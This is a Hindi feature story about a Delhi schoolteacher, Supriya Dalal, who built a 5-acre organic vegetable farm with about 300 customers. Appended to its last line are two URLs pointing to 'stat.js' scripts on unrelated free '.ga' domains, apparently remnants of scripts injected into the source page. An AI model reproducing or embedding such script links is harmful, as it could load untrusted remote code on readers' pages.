दिल्ली में रहने वाली सुप्रिया दलाल सरकारी स्कूल में टीचर हैं। टीचिंग के साथ साथ वह खेती भी करती हैं। डेढ़ साल पहले उन्होंने ऑर्गेनिक सब्जियों की खेती शुरू की थी आज वो 5 एकड़ जमीन पर लगभग 17 तरह की सब्जियां उगा रही है और 300 से ज्यादा उनके कस्टमर हैं। हर महीने आमदनी उनकी लाखों रुपए की है सुप्रिया बताती हैं कि वो कभी फार्मिंग के बारे में नहीं सोचा था। उनकी लाइफ में यह अचानक से आया और उनके लाइफ स्टाइल मैं शामिल हो गया।
2016 में दिल्ली सरकारी स्कूल ने स्कूली शिक्षकों के लिए एक नई व्यवस्था शुरू की जिससे ऐसे लोग जो प्रोफेशनल ग्रोथ चाहते है और इनोवेटिव सोच रखतेथे उनके लिए एक अलग से प्रोजेक्ट लांच किया गया और किस्मत से उनका सिलेक्शन उसमें हो गया प्रोजेक्ट में शामिल होने के बाद फिक्स टाइमिंग के बाध्यता खत्म हो गई और सहूलियत के हिसाब से ऑनलाइन लेक्चर लेना और वर्कशॉप लेने की छूट मिल गई इस प्रोजेक्ट में रेलीवेंट टॉपिक पर वर्कशॉप और लर्निंग प्रोग्राम करते रहती हैं उन्होंने बताया कि मुझे ऑर्गेनिक फार्मिंग पर कुछ सेशन अटेंड करने को मिला जिससे काफी कुछ सीखने को मिला,
उस समय पता चला है कि हम जो बाहर से सब्जियां और खाने की चीजें खरीद रहे है उसमें कितना केमिकल मिला है और इससे हमारे हेल्प को इतना नुकसान हो रहा है यह सब जानने के बाद उन्होंने सोच लिया कि कम से कम जरूरत की चीजे उगाई जा सकती है उन्होंने इसके बारे में कई लोगों से बात की लेकिन किसी ने साथ नहीं दिया और उन्होंने खुद रिसर्च की और उन्हें सबसे ज्यादा यूट्यूब से हेल्प मिला, जो लोग ऑर्गेनिक खेती करते हैं यूट्यूब पर उनके वीडियोस देखें
आगे सुप्रिया बताती हैं की दिल्ली से थोड़ी दूर पर कराला में हमारी थोड़ी जमीन थी वह अप्रैल 2019 में 1 एकड़ जमीन में ऑर्गेनिक फार्मिंग की शुरुआत की सबसे पहले मैंने सब्जियां उगाई मुझे पहले ही साल में अच्छा रिस्पॉन्स रहा इसके बाद मैंने खेती का दायरा बढ़ा दिया अभी 5 एकड़ जमीन पर खेती कर रही हूं और 17 तरह की सब्जियां ऊगा रही हूँ और मेरे साथ 10 लोगो की टीम भी काम रही है ।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms